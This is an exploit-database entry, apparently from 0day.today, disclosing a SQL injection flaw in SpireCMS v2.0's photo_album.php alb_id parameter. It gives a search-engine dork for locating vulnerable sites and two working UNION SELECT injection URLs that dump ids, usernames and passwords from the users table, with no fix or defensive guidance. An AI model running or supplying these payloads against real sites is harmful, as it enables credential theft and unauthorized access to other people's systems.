id: 10212
date: 12/13/2009
title: SpireCMS v2.0 SQL Injection Vulnerability
author: Dr.0rYX
cves: 

=========================================
SpireCMS v2.0 SQL Injection Vulnerability
=========================================

***************************************************************************/
 
[ Software Information ]
 
[+] Vendor : http://www.spiread.com/
[+] script   : SpireCMS v2.0
[+] Download : http://www.spiread.com/demo/ (sell script)
[+] Vulnerability : php SQL injection
[+] Dork :inurl:"photo_album.php?alb_id="
 
**************************************************************************/
[ Vulnerable File ]
 
http://server/photo_album.php?alb_id=[N.A.S.T ]
 
[ Exploit ]
 
http://server/photo_album.php?alb_id=-1+UNION+SELECT+GROUP_Concat(id,0x3a,username,0x3a,password)+from+users
 
http://server/photo_album.php?alb_id=-1+UNION+SELECT+GROUP_Concat(id,0x3a,username,0x3a,password),null+from+users



#  0day.today [2023-03-26]  #